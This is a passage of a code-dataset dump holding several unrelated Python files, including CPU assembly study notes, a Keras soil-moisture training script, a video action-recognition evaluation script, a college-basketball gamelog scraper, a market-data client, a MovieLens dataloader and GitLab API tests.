Top-Down)\n#_____________________________________________\n# Instruction location\n# \"PUSH register\"\n# Decrement the stack pointer\n# place the value at the given register\n# Stack pointer points at the item most recently pushed\n#\n\n\n#____________________________________________________________________________\n#################### Subroutines #############################\n\n# Think of subroutines in a CPU as functions in higher-level languages\n\n# In assembly, we \"CALL\" a subroutine at a particular address.\n\n# Then we \"RET\"(return) from that subroutine to pick up where we left off, just like a function\n# does in a higher level language.\n\n####### Limitations with assembly-level subroutines\n# CPU's are pretty simple machines.\n# No arguments. Only takes one operand\n# No return values. 
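#\n# (A minimal RET sketch to pair with the CALL handler in the emulator above;\n# the opcode value 8 is a placeholder assumption, these notes don't pin it down:)\n#\n#   RET = 8\n#   ...\n#   elif ir == RET:\n#       pc = pop_value()    # jump back to the saved return address\n#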
\n# These can be implemented in a variety of ways (as you'll learn)\n\n###### Use the stack!!!\n\n# When we call a subroutine, we need to store the return address somewhere so we\n# know where to go when we hit the \"RET\" instruction.\n\n# CPUs use a stack for this.\n\n# CALL will push the address of the instruction after it onto the stack, then move\n# the PC to the subroutine address\n\n# RET will pop the return address off of the stack, and store it in the PC.\n\n# Use any place you'd use functions in a higher-level language\n\n## DRY principle\n\n# High-level languages eventually use CALL and RET deep down to implement functions.\n\n# The stack is used to store the return address so that we know where to resume\n# instead of entering an infinite loop\n\n# Since stacks are last in, first out, we can create local variables by pushing\n# more values onto the stack for local variable use, and popping them off one by one\n# until we are left with the final stack pop to return from our subroutine\n\n# arguments could be passed to subroutines by adding them as instructions\n\n#_____________________________________________________________\n# beej's notes\n# Subroutines are functions\n# but you can't pass anything in\n# and they can't return anything\n\n\n#----------------------------\n# def foo():\n#     print(\"foo 1\")\n\n#     return\n\n# def bar():\n#     print(\"bar 1\")\n#     foo()\n#     print(\"bar 2\")\n\n#     return\n\n# print(\"main 1\")\n# bar()\n# print(\"main 2\")\n#_______________________________\n\n# The above is a good example of how a CPU keeps track of where it is\n# in a calling process. Addresses are assigned to the different commands.\n\n\n# CALL:\n    # push the return address on the stack. This is the address of the instruction which follows the CALL instruction\n    # set pc to address of subroutine\n\n# RET:\n    # pop the return address value from the stack\n    # assign the pc to that value\n\n# When you call:\n    # Allocate a stack frame\n    # stack frame is the return address and the locals\n\n\n# When you return:\n    # Deallocate (pop) that stack frame\n    # set the pc to the return address\n\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"508638845","text":"\"\"\"\nSome ANSI escape codes for use in terminal output formatting.\nSee https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html\n\"\"\"\n\n# Colors\n_YELLOW = \"\\u001b[33m\"\n\n# Decorations\n_BOLD = \"\\u001b[1m\"\n\n# Aliases\nOK = _BOLD\nRESET = \"\\u001b[0m\"\nWARNING = _YELLOW + _BOLD\n","sub_path":"comparetransactionsets/terminalcolors.py","file_name":"terminalcolors.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"559667862","text":"import netCDF4 as nc\nfrom tensorflow import keras\nimport numpy as np\nfrom keras.models import load_model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\n\n# import mask to define catchment boundaries\nmask = np.load('mask.npy')\nmask_inv = np.invert(mask)\n\n\n# # # PREPROCESS LABELS, UPPER ZONE SOIL MOISTURE # # #\n\n# load label data\nfn = '/home/WUR/keppl001/MScThesis_env/data/outmaps.nc'\nlabel_data = nc.Dataset(fn)\n\n# select labels and apply mask to fill area outside catchment with nan\nsoil_moisture = label_data['ust_0_']\nsoil_moisture = np.ma.filled(soil_moisture, fill_value = np.nan)\nsoil_moisture = 
np.ma.getdata(soil_moisture)\nsoil_moisture[mask_inv] = np.nan\n\n# loop through dataset to fill values outside catchment with median per timestep\nfor i in np.arange(len(soil_moisture)):\n median = np.nanmedian(soil_moisture[i])\n soil_moisture[i] = np.nan_to_num(soil_moisture[i], copy=False, nan = median)\nlabels = np.expand_dims(soil_moisture, axis = 1)\n\n# define train and validation period\ntrain_window = [0, 11323]\nval_window = [11323, 13514]\n\nlag = 10\n \n# load train and validation features\nfeatures_train = 'PATH'\nfeatures_val = 'PATH' \nfeatures_train = np.load(features_train)\nfeatures_val = np.load(features_val)\n\n# reshape labels to fit shape (BATCH, HEIGHT, WIDTH, CHANNEL)\nlabels_train = labels[train_window[0] + lag:train_window[1]]\nlabels_val = labels[val_window[0] + lag:val_window[1]]\n \nlabels_train = np.reshape(labels_train, (features_train.shape[0], 91, 134, 1))\nlabels_val = np.reshape(labels_val, (features_val.shape[0], 91, 134, 1))\n\n\n# # # MODEL TRAINING # # #\n\n# load S2 model\nmodel = load_model('models/model_stacked_2')\n\n# define optimizer and lr\nopt = keras.optimizers.Adam(learning_rate=0.001)\nmodel.compile(loss = 'mean_squared_error', optimizer = opt, metrics = 'mse')\n\n# add model checkpoints to save model after improvement\nmc = ModelCheckpoint('model_stacked_2.h5', monitor='val_loss', mode='min', save_best_only=True, verbose=1)\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=100)\n\n# train model\nhistory = model.fit(x = features_train, y = labels_train, validation_data = (features_val, labels_val), epochs = 250,\n batch_size = 2, verbose = 2, callbacks=[es, mc], shuffle = False, initial_epoch=29)\n\n# save learning\narray_hist = np.array(list(history.history.values())).transpose()\nnp.save('history_stacked_2.csv', array_hist)","sub_path":"training/runfile_stacked_2.py","file_name":"runfile_stacked_2.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24912075","text":"#!/usr/bin/env python\n\nimport os, sys\nimport collections\nimport numpy as np\nimport cv2\nimport math\nimport random\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport csv\nimport json,pickle\n\nsys.path.insert(0, \"../\")\nimport models\nfrom VideoSpatialPrediction import VideoSpatialPrediction\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1,2,3\"\n\ndef softmax(x):\n y = [math.exp(k) for k in x]\n sum_y = math.fsum(y)\n z = [k/sum_y for k in y]\n\n return z\n\ndef def_my_result(spat_prediction,layers = 2,topk = 5):\n sort_order = np.argsort(spat_prediction,axis=0)\n input_img_num_fromsingmp4 = np.argsort(spat_prediction,axis=0).shape[1] #int 250\n pre_result = sort_order[-layers:,:]\n finalpredict = np.reshape(pre_result, (1, input_img_num_fromsingmp4*layers))[0].tolist()\n count = np.zeros(90)\n for i,label in enumerate(finalpredict):\n count[label]=count[label]+1\n final_num = np.sort(count)[-topk:]\n final_label = np.argsort(count)[-topk:]\n return final_label ,final_num\n\ndef write_json(mp4_name,label,score,class_list):\n single_result = []\n single_result.append(mp4_name)\n temp_single_result = []\n for i in range(len(label)):\n temp_single_result.append({\"label\": class_list[label[-i-1]][:-1], 
\"score\": float('%.6f' % score[-i-1])})\n final_result['results'][mp4_name] = temp_single_result\n\n with open(\"./result.json\", \"w\") as file:\n json.dump(final_result, file)\n file.close()\n\n\n\ndef main():\n\n model_path ='/home/thl/Desktop/challeng/checkpoints/model_best.pth.tar'\n class_name_file = '/home/thl/Desktop/challeng/datasets/settings/class_name.txt'\n class_list = []\n for line in open(class_name_file, \"r\"):\n class_list.append(line)\n\n start_frame = 0\n num_categories = 90\n\n model_start_time = time.time()\n params = torch.load(model_path)\n\n spatial_net = models.rgb_vgg16(pretrained=False, num_classes=90)\n if torch.cuda.is_available():\n spatial_net = torch.nn.DataParallel(spatial_net)\n spatial_net.load_state_dict(params['state_dict'])\n spatial_net.cuda()\n spatial_net.eval()\n model_end_time = time.time()\n model_time = model_end_time - model_start_time\n print(\"Action recognition model is loaded in %4.4f seconds.\" % (model_time))\n\n val_file_dir = '/home/thl/Desktop/challeng/datasets/settings/test_set.txt'\n val_list = []\n for line in open(val_file_dir, \"r\"):\n val_list.append(line)\n\n print(\"we got %d test videos\" % len(val_list))\n\n line_id = 1\n\n result_list = []\n for line in val_list:\n clip_path ='/home/thl/Desktop/challeng/datasets/frame_and_flow/test/'+line[:-1]\n spatial_prediction = VideoSpatialPrediction(\n clip_path,\n spatial_net,\n num_categories,\n start_frame)\n\n final_lab,final_num= def_my_result(spatial_prediction, layers=2)\n # avg_spatial_pred_fc8 = np.mean(spatial_prediction, axis=1)\n final_softmax = softmax(final_num/sum(final_num))\n write_json(line[:-1], final_lab, final_softmax,class_list)\n # result_list.append(avg_spatial_pred_fc8)\n\n # pred_index = np.argmax(avg_spatial_pred_fc8)\n\n # print(final_lab,\" \",final_softmax)\n print_score = [float('%.2f' % final_softmax[0]),float('%.2f' % final_softmax[1]),float('%.2f' % final_softmax[2]),\n float('%.2f' % final_softmax[3]),float('%.2f' % final_softmax[4])]\n\n print(final_lab,print_score, ' ',line_id ,' / ',len(val_list),' video ')\n line_id += 1\n print(len(val_list))\n\n\nif __name__ == \"__main__\":\n final_result = {}\n final_result['results'] = {}\n main()\n\n\n\n\n \n","sub_path":"script/HISTORY/testset_eval.py","file_name":"testset_eval.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"490265033","text":"#!/usr/bin/env python\nimport grequests\nfrom urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\nfrom gamelogs import Gamelogs\nfrom export import CSV\nfrom gamelogsurls import GamelogUrls\nfrom parse_to_csv import Parse_To_Csv\n\n\nyear = None\nyear_is_valid = False\ninitial_url = 'https://www.sports-reference.com/cbb/seasons/2019-school-stats.html'\napp_is_running = True\n\nwhile app_is_running:\n \n #simple input validation\n while year_is_valid==False:\n input_value = input('input year or press enter/return to exit: ')\n\n if(input_value==''):\n raise SystemExit\n\n elif input_value.isdigit():\n if not len(input_value)==4:\n print('invalid year')\n continue\n\n elif int(input_value)<2011:\n print('no gamelogs before 2011')\n continue\n else:\n year=int(input_value)\n year_is_valid=True\n break\n else:\n print('not a number')\n continue\n \n \n\n \n \n \n if year_is_valid:\n urls = GamelogUrls(year, initial_url)\n\n url_has_data = True\n data = []\n counter=0\n \n request = (grequests.get(link) for link in urls.get_gamelogs_urls())\n response 
= grequests.imap(request)\n\n input_choice_is_valid = False\n \n\n while input_choice_is_valid==False:\n input_value = input('fetch gamelogs for {} ONLY? (y/n): '.format(year))\n \n if input_value=='y':\n input_choice_is_valid = True\n print('fetching gamelogs for {} season...'.format(year))\n \n for link in response:\n if link.status_code==200:\n parse = Parse_To_Csv(link.url, year)\n parsed_gamelogs = parse.inputted_year_gamelogs()\n else:\n continue\n \n if parsed_gamelogs:\n csv = CSV(parsed_gamelogs,year)\n csv.generate_csv()\n \n else:\n year_is_valid = False\n raise SystemExit\n \n\n\n\n elif input_value=='n':\n input_choice_is_valid = True\n print('fetching gamelogs since {} season...'.format(year))\n \n for link in response:\n if link.status_code==200:\n parse = Parse_To_Csv(link.url, year)\n parsed_gamelogs = parse.recursive_year_gamelogs()\n else:\n continue\n\n if parsed_gamelogs:\n csv = CSV(parsed_gamelogs,year)\n csv.generate_years_csv()\n \n \n else:\n year_is_valid=False\n raise SystemExit\n \n \n else:\n print('y for yes, n for no... enter year again')\n year_is_valid=False\n break\n \n \n \n \n \n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351180840","text":"\"\"\"Chunk processor engine interface\"\"\"\n\nfrom socket_messages import SocketTranscriptMessage, SocketErrorMessage\n\nclass EngineInterface():\n \"\"\"Interface for chunk processor engines\"\"\"\n def __init__(self, send_message = None):\n self.send_message = send_message\n self.accept_chunks = True\n self.is_open = True\n # Defaults\n self._sample_rate = float(16000)\n self._language = \"\" # \"de-DE\", \"en-US\", etc. (could be: \"de_DE\", \"de\", ...)\n self._asr_model_path = \"\" # model folder relative to: settings.asr_models_folder\n self._continuous_mode = False # send final result once after stop event\n self._optimize_final_result = False # use text processors to optimize final result\n\n async def process(self, chunk: bytes):\n \"\"\"Process chunk\"\"\"\n async def finish_processing(self):\n \"\"\"Block new process requests, wait for last process to finish and send result\"\"\"\n async def close(self):\n \"\"\"Close and clean up\"\"\"\n def get_options(self):\n \"\"\"Return possible options as object (optionally) with defaults\"\"\"\n return {}\n\n async def send_transcript(self,\n transcript, is_final = False, confidence = -1, features = None, alternatives = None):\n \"\"\"Send transcript result\"\"\"\n if self.send_message is not None:\n msg = SocketTranscriptMessage(\n transcript, is_final, confidence, features, alternatives)\n await self.send_message(msg)\n\n async def on_before_close(self):\n \"\"\"Run before close for any required extra action\"\"\"\n self.is_open = False\n\n async def on_error(self, error_message):\n \"\"\"Send error message\"\"\"\n self.accept_chunks = False\n if self.send_message is not None:\n await self.send_message(\n SocketErrorMessage(500, \"AsrEngineError\", error_message))\n","sub_path":"src/engine_interface.py","file_name":"engine_interface.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281720830","text":"# encoding: UTF-8\n\"\"\"\nModule dataclient defines ThanfDataClient.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport asyncio\nimport datetime\nimport 
ujson\nimport pandas as pd\nimport requests\nimport logging\nfrom . import utils\n\n\nclass ThanfDataClient(object):\n\n def __init__(self, address=\"http://data.thanf.com\"):\n self._address = address\n self._bar_columns = [\n 'symbol',\n 'trade_date',\n 'open',\n 'high',\n 'low',\n 'close',\n 'volume',\n 'turnover',\n 'trade_status']\n self._index_weights_columns = [\n 'trade_date',\n 'symbol',\n 'sec_name',\n 'weight',\n 'index_code']\n self.adj_factor_columns = [\n 'symbol',\n 'trade_date',\n 'adjust_factor']\n self._index_member_columns = [\n 'in_date',\n 'out_date',\n 'symbol'\n ]\n\n @staticmethod\n def _parse_error(content):\n err = eval(content)\n return \"{0},{1}\".format(err.get('error_code'), err.get('error_msg'))\n\n @staticmethod\n def _parse(content):\n try:\n if content.startswith(b\"{'error_code'\"):\n return None, ThanfDataClient._parse_error(content)\n else:\n return ujson.loads(content), None\n except ValueError:\n with open(os.path.join(os.getcwd(), \"error.txt\"), 'wb') as f:\n f.write(content)\n raise\n\n def query_trade_dates(self, start_date, end_date):\n if start_date == \"\":\n start_date = \"20100101\"\n if end_date == \"\":\n end_date = \"{0}1231\".format(datetime.datetime.today().year)\n params = {'start_date': start_date, \"end_date\": end_date}\n r = requests.get(\"{0}/trading_dates\".format(self._address), params)\n dates, err_msg = self._parse(r.content)\n columnset = {\"istradeday\": ['T'] * len(dates), \"trade_date\": dates}\n return utils.to_dataframe(columnset), err_msg\n\n def _get_bar_url(self, symbol, start_date, end_date, ktype, atype):\n url_pattern = \"{0}/get_history_bars?{1}\"\n items = {\n \"order_book_id\": symbol,\n \"start_date\": start_date,\n \"end_date\": end_date,\n \"ktype\": ktype,\n \"atype\": utils.get_atype(atype)\n }\n return url_pattern.format(self._address, utils.dict2url(items))\n\n @staticmethod\n def _get_response_async(urls: list):\n async def get_json(url):\n json = await loop.run_in_executor(None, requests.get, url)\n responses.append(json)\n\n async def run(items: list):\n await asyncio.gather(*[get_json(x) for x in items])\n\n loop = asyncio.new_event_loop()\n responses = []\n for i in utils.chunks(urls, max(len(urls) // 1, 1)):\n loop.run_until_complete(run(i))\n return responses\n\n @staticmethod\n def _get_response(urls: list):\n logging.info('get_response begin')\n responses = []\n with requests.Session() as s:\n for i in urls:\n responses.append(s.get(i))\n logging.info('get_response end')\n return responses\n\n def _parse_bar(self, data: list):\n if len(data) == 0 or len(data[0]) == len(self._bar_columns):\n df = pd.DataFrame(data, columns=self._bar_columns)\n df['trade_status'] = df['trade_status'].apply(lambda x: '停牌' if x != '交易' else x)\n else:\n df = pd.DataFrame(data, columns=self._bar_columns[:-1])\n df['trade_status'] = '交易'\n df['vwap'] = 0\n df.loc[df['volume'] > 0, 'vwap'] = df['turnover']/df['volume']\n return df\n\n def _parse_daily_rsp(self, rsp_list: list):\n logging.info('parse_daily_rsp begin')\n rsp_list = [self._parse(x.content) for x in rsp_list]\n df = pd.DataFrame(columns=self._bar_columns)\n err_msg = None\n for data, err in rsp_list:\n if data is not None:\n df = df.append(self._parse_bar(data), sort=False)\n else:\n err_msg = err\n logging.info('parse_daily_rsp end')\n return df, err_msg\n\n def daily(self, symbol: str, start_date, end_date, adjust_mode=None):\n urls = list(map(\n lambda x: self._get_bar_url(x, start_date, end_date, \"D\", adjust_mode),\n symbol.split(',')))\n\n return 
self._parse_daily_rsp(self._get_response(urls))\n\n def query_inst_info(self, symbol, fields: list):\n url = '{0}/instruments?order_book_id={1}'.format(self._address, symbol)\n data, err_msg = self._parse(requests.get(url).content)\n return pd.DataFrame(data)[fields], err_msg\n\n def query_index_weights_range(self, index, start_date, end_date):\n args = utils.dict2url({\n 'order_book_id': index,\n 'start_date': start_date,\n 'end_date': end_date})\n url = '{0}/get_index_component_info?{1}'.format(self._address, args)\n data, err_msg = self._parse(requests.get(url).content)\n return pd.DataFrame(data, columns=self._index_weights_columns), err_msg\n\n def _get_adj_factor_url(self, symbol, start_date, end_date):\n url_pattern = \"{0}/get_stock_adjfactor?{1}\"\n items = {\n \"order_book_id\": symbol,\n \"start_date\": start_date,\n \"end_date\": end_date\n }\n return url_pattern.format(self._address, utils.dict2url(items))\n\n def _parse_adj_factor(self, data: list):\n return pd.DataFrame(data, columns=self.adj_factor_columns)\n\n def _parse_adj_factor_rsp(self, rsp_list: list):\n rsp_list = [self._parse(x.content) for x in rsp_list]\n df = pd.DataFrame(columns=self.adj_factor_columns)\n err_msg = None\n for data, err in rsp_list:\n if data is not None:\n df = df.append(self._parse_adj_factor(data))\n else:\n err_msg = err\n\n return df, err_msg\n\n def query_adj_factor(self, symbol, start_date, end_date):\n urls = list(map(\n lambda x: self._get_adj_factor_url(x, start_date, end_date),\n symbol.split(',')))\n return self._parse_adj_factor_rsp(self._get_response(urls))\n\n def query_index_member(self, index, start_date, end_date):\n url_pattern = \"{0}/get_index_component_transfer_info?{1}\"\n args = utils.dict2url({\n 'order_book_id': index,\n 'start_date': start_date,\n 'end_date': end_date})\n\n rsp = requests.get(url_pattern.format(self._address, args))\n data, err_msg = self._parse(rsp.content)\n return pd.DataFrame(data, columns=self._index_member_columns), err_msg\n","sub_path":"jaqs_thanf/dataclient.py","file_name":"dataclient.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223180234","text":"import os\r\nimport numpy as np\r\nfrom data_set import filepaths as fp\r\nimport pandas as pd\r\n\r\nbase_path = fp.Ml_100K.ORGINAL_DIR\r\ntrain_path = os.path.join(base_path,'ua.base')\r\ntest_path = os.path.join(base_path,'ua.test')\r\nuser_path = os.path.join(base_path,'u.user')\r\nitem_path = os.path.join(base_path,'u.item')\r\noccupation_path = os.path.join(base_path,'u.occupation')\r\n\r\n\r\ndef __read_age_index():\r\n age_levels = set()\r\n with open(user_path, 'r') as f:\r\n for line in f.readlines():\r\n d = line.strip().split('|')\r\n age_level = int(d[1])//10\r\n age_levels.add(age_level)\r\n return len(age_levels)\r\n\r\ndef __read_occupation_index(begin):\r\n occupations = {}\r\n with open(occupation_path,'r') as f:\r\n names = f.read().strip().split('\\n')\r\n for name in names:\r\n occupations[name]=begin\r\n begin+=1\r\n return occupations,begin\r\n\r\ndef generate_user_df():\r\n begin = __read_age_index()\r\n gender_dict = { 'M':begin, 'F':begin+1 }\r\n begin += 2\r\n occupation_dict,begin = __read_occupation_index(begin)\r\n uids = []\r\n all_users = []\r\n\r\n with open(user_path,'r') as f:\r\n for line in f.readlines():\r\n user_indexs=[]\r\n d = line.strip().split('|')\r\n age = int(d[1])//10\r\n uids.append(d[0])\r\n user_indexs.append(age)\r\n 
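            # feature ids, in order: age bucket, then gender id, then occupation id\r\n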
user_indexs.append(gender_dict[d[2]])\r\n user_indexs.append(occupation_dict[d[3]])\r\n all_users.append(user_indexs)\r\n\r\n df = pd.DataFrame(all_users,index=uids,columns=['age', 'gender', 'occupation'])\r\n df.to_csv(fp.Ml_100K.USER_DF)\r\n return begin\r\n\r\ndef __get_year_index(begin):\r\n years = set()\r\n with open(item_path, 'r', encoding = 'ISO-8859-1') as f:\r\n for line in f.readlines():\r\n d = line.strip().split('|')\r\n year = d[2].split('-')\r\n if len(year)>2:\r\n years.add(int(year[2]))\r\n years.add(0)\r\n years = sorted(years)\r\n print(years)\r\n return {k:v+begin for v,k in enumerate(years)},len(years)\r\n\r\ndef generate_item_df(begin,out):\r\n items = {}\r\n years_dict, begin = __get_year_index(begin)\r\n max_n_neibour = 0\r\n all_items = []\r\n iids = []\r\n with open( item_path, 'r', encoding = 'ISO-8859-1' ) as f:\r\n for line in f.readlines():\r\n item_index = []\r\n d = line.strip().split('|')\r\n iids.append(int(d[0]))\r\n year = d[2].split('-')\r\n if len(year) > 2:\r\n item_index.append(years_dict[int(year[2])])\r\n else:\r\n item_index.append(0)\r\n\r\n subjects = d[5:]\r\n if begin == 0:\r\n begin = len(subjects)\r\n for i in range(len(subjects)):\r\n if int(subjects[i]) == 1:\r\n item_index.append( begin+i )\r\n all_items.append( item_index )\r\n if len(item_index) > max_n_neibour:\r\n max_n_neibour = len(item_index)\r\n n_all=[]\r\n for item in all_items:\r\n n_all.append( np.random.choice( item, size = max_n_neibour, replace = True ) )\r\n\r\n df = pd.DataFrame( n_all, index = iids )\r\n df.to_csv(out )\r\n\r\n #print( all_items, max_n_neibour )\r\n return items\r\n\r\ndef get1or0(r):\r\n return 1.0 if r>3 else 0.0\r\n\r\n\r\ndef __read_rating_data(path):\r\n triples=[]\r\n with open(path,'r') as f:\r\n for line in f.readlines():\r\n d=line.strip().split('\\t')\r\n triples.append([int(d[0]),int(d[1]),get1or0(int(d[2]))])\r\n return triples\r\n\r\ndef read_data_user_item_df():\r\n user_df = pd.read_csv( fp.Ml_100K.USER_DF, index_col = 0 )\r\n item_df = pd.read_csv( fp.Ml_100K.ITEM_DF_0, index_col = 0 )\r\n train_triples = __read_rating_data(train_path)\r\n test_triples= __read_rating_data(test_path)\r\n return train_triples, test_triples, user_df, item_df, max(user_df.max())+1, max(item_df.max())+1\r\n\r\n\r\ndef read_data():\r\n user_df = pd.read_csv( fp.Ml_100K.USER_DF, index_col = 0 )\r\n item_df = pd.read_csv( fp.Ml_100K.ITEM_DF, index_col = 0 )\r\n train_triples = __read_rating_data(train_path)\r\n test_triples= __read_rating_data(test_path)\r\n return train_triples, test_triples, user_df, item_df,max(item_df.max())+1\r\n\r\n\r\nif __name__ == '__main__':\r\n item_df = generate_item_df(0, fp.Ml_100K.ITEM_DF_0)\r\n #print(item_df)\r\n\r\n train_triples, test_triples, user_df, item_df,lenitems = read_data()\r\n print(user_df)\r\n print(item_df)\r\n\r\n","sub_path":"basic_sim/dataloader4ml100kIndexs.py","file_name":"dataloader4ml100kIndexs.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638651199","text":"import csv\nfrom kmpp.pandora_box import PandoraBox\n\npandora_box = PandoraBox()\nmarket_contr = {}\noutput = {}\n\nfile = 'pandora_box.csv'\nwith open(file, 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n total_prod = 0\n for row in csv_reader:\n prod_score = []\n for col in row:\n prod_score.append(float(col))\n pandora_box.insert_score(prod_score) \n total_prod += 1\n# pandora_box.print_box()\n\nk_product = 
int(input('Masukkan jumlah produk : '))\nprint('Jumlah produk: {}'.format(k_product))\ntime_start, time_end = input('Masukkan waktu awal dan akhir (dipisahkan oleh spasi): ').split()\nprint('Interval waktu: {} - {}'.format(time_start, time_end))\n\n# compute the total market contribution during the time interval\n# assumes product ids are consecutive integers\nfor i in range(0, total_prod):\n    market_contr[i] = pandora_box.get_score(i, int(time_start), int(time_end))\nprint('Market Contribution')\nfor key in market_contr:\n    print('{} : {}'.format(key, market_contr[key]))\n\n# sort largest contribution first\nsorted_prod = sorted(market_contr, key=lambda x: (market_contr[x]), reverse=True)\nprint(sorted_prod)\n\n# output the top k products\nfor i in range(0, k_product):\n    output[sorted_prod[i]] = market_contr[sorted_prod[i]]\n\nprint(output)\n","sub_path":"app/bak/src-rsl/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256887255","text":"import os\nimport unittest\n\nfrom ogr.services.gitlab import GitlabService\nfrom ogr.persistent_storage import PersistentObjectStorage\n\nDATA_DIR = \"test_data\"\nPERSISTENT_DATA_PREFIX = os.path.join(\n    os.path.dirname(os.path.realpath(__file__)), DATA_DIR\n)\n\n\nclass GitlabTests(unittest.TestCase):\n    def setUp(self):\n        self.token = os.environ.get(\"GITLAB_TOKEN\")\n        self.user = os.environ.get(\"GITLAB_USER\")\n        test_name = self.id() or \"all\"\n\n        persistent_data_file = os.path.join(\n            PERSISTENT_DATA_PREFIX, f\"test_gitlab_data_{test_name}.yaml\"\n        )\n        PersistentObjectStorage().storage_file = persistent_data_file\n\n        if PersistentObjectStorage().is_write_mode and (\n            not self.user or not self.token\n        ):\n            raise EnvironmentError(\"please set GITLAB_TOKEN GITLAB_USER env variables\")\n        else:\n            self.token = \"some_token\"\n\n        self.service = GitlabService(\n            token=self.token, instance_url=\"https://gitlab.gnome.org\", ssl_verify=True\n        )\n\n        self.project = self.service.get_project(\n            repo=\"testing-ogr-repo\", namespace=\"lbarcziova\"\n        )\n\n    def tearDown(self):\n        PersistentObjectStorage().dump()\n\n\nclass GenericCommands(GitlabTests):\n    def test_branches(self):\n        branches = self.project.get_branches()\n        assert branches\n        assert \"master\" in branches\n\n    def test_get_file(self):\n        file_content = self.project.get_file_content(\"README.md\")\n        assert file_content\n        assert \"This is new README for testing-ogr-repo\" in file_content\n\n    def test_nonexisting_file(self):\n        with self.assertRaises(FileNotFoundError):\n            self.project.get_file_content(\".blablabla_nonexisting_file\")\n\n    def test_username(self):\n        # check just the length, because the value depends on who regenerated the data files\n        assert len(self.service.user.get_username()) > 3\n\n    def test_email(self):\n        email = self.service.user.get_email()\n        assert email\n        assert len(email) > 3\n        assert \"@\" in email\n        assert \".\" in email\n\n\nclass Issues(GitlabTests):\n    def test_get_issue_list(self):\n        issue_list = self.project.get_issue_list()\n        assert issue_list\n        assert len(issue_list) >= 1\n\n    def test_issue_info(self):\n        issue_info = self.project.get_issue_info(issue_id=1)\n        assert issue_info\n        assert issue_info.title.startswith(\"My first issue\")\n        assert issue_info.description.startswith(\"This is testing issue\")\n\n    def test_get_all_issue_comments(self):\n        comments = self.project._get_all_issue_comments(issue_id=2)\n        assert comments[0].comment.startswith(\"Comment\")\n        assert comments[0].author == 
\"lbarcziova\"\n assert len(comments) == 2\n\n def test_create_issue(self):\n issue = self.project.create_issue(\n title=\"Issue 2\", description=\"Description for issue 2\"\n )\n assert issue.title == \"Issue 2\"\n assert issue.description == \"Description for issue 2\"\n\n def test_close_issue(self):\n issue = self.project.close_issue(issue_id=1)\n assert issue.status == \"closed\"\n\n\nclass PullRequests(GitlabTests):\n def test_pr_list(self):\n pr_list = self.project.list_pull_requests()\n count = len(pr_list)\n assert pr_list\n assert count >= 1\n assert pr_list[count - 1].title == \"change\"\n\n def test_pr_info(self):\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info\n assert pr_info.title == \"change\"\n assert pr_info.description == \"description of mergerequest\"\n\n def test_get_all_pr_commits(self):\n commits = self.project.get_all_pr_commits(pr_id=1)\n assert commits[0] == \"0709030b613d56752725c33df36041c2b7610506\"\n assert commits[1] == \"f3881188db863e4e053f5a82422f067ac9ba2594\"\n assert len(commits) == 2\n\n def test_get_all_pr_comments(self):\n comments = self.project._get_all_pr_comments(pr_id=1)\n count = len(comments)\n assert comments[count - 1].comment == \"first comment of mergerequest\"\n assert comments[count - 1].author == \"lbarcziova\"\n assert count == 5\n\n def test_update_pr_info(self):\n pr_info = self.project.get_pr_info(pr_id=1)\n original_description = pr_info.description\n\n self.project.update_pr_info(pr_id=1, description=\"changed description\")\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info.description == \"changed description\"\n\n self.project.update_pr_info(pr_id=1, description=original_description)\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info.description == original_description\n\n\nclass Tags(GitlabTests):\n def test_get_tags(self):\n tags = self.project.get_tags()\n count = len(tags)\n assert count >= 2\n assert tags[count - 1].name == \"0.1.0\"\n assert tags[count - 1].commit_sha == \"957d267a5b0cd9e615cd081c0eb02397dce1eb73\"\n\n def test_tag_from_tag_name(self):\n tag = self.project._git_tag_from_tag_name(tag_name=\"0.1.0\")\n assert tag.commit_sha == \"957d267a5b0cd9e615cd081c0eb02397dce1eb73\"\n\n\nclass Releases(GitlabTests):\n def test_create_release(self):\n count_before = len(self.project.get_releases())\n release = self.project.create_release(\n name=\"test\", tag_name=\"0.2.0\", description=\"testing release\", ref=\"master\"\n )\n count_after = len(self.project.get_releases())\n assert release.tag_name == \"0.2.0\"\n assert release.title == \"test\"\n assert release.body == \"testing release\"\n assert count_before + 1 == count_after\n\n def test_get_releases(self):\n releases = self.project.get_releases()\n assert releases\n count = len(releases)\n assert count >= 1\n assert releases[count - 1].title == 